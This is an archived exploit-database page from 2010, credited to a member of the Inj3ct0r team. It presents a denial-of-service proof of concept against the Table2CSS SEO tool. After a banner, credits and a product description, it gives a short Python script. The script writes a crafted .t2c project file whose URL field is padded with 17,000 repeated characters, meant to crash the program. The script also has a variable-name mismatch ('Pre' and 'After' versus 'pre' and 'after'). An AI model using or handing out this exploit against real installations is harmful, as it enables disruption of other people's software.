Table2CSS Denial of Service PoC
Posted on 06 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Table2CSS Denial of Service PoC</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================== Table2CSS Denial of Service PoC =============================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ################################### 1 0 I'm SONiC member from Inj3ct0r Team 1 1 ################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Name : Table2CSS ---Denial of Service PoC Date : August 5 ,2010 Critical Level :Low vendor URL :?? http://www.table2css.com ####################################################################################################### Author : ..::[ SONiC ]::.. aka ~the_pshyco~ <sonicdefence[at]gmail.com> Special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,MA1201,D3aD F0x,Nishi,Bunny Greetz to :iNj3cT0r.com, www.andhrahackers.com ####################################################################################################### Description: TABLE2CSS is a SEO tool that converts HTML pages with tables to tableless CSS code. It is invaluable if you want to : Reduce the percentage of HTML markup in your pages and get a better search engine ranking. Reduce the overall size of your web pages and even further improve your positioning in search engines. Replace the complex table layout in your website with simpler, easily maintainable CSS code. ####################################################################################################### Denial of Service - PoC junk = "A"*17000 Pre = '''<root><version>17</version><outputDir/><cssLocation>{FILE}.css</cssLocation> <pageWidth>1024</pageWidth><pageHeight>768</pageHeight><urls><url>''' After = '''</url></urls></root>''' payload = pre+junk+after file = open("WTF.t2c","w") file.write(payload) file.close() print('done!!') ############################################################################################################### # ..::[ SONiC ]::.. aka the_pshyco # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>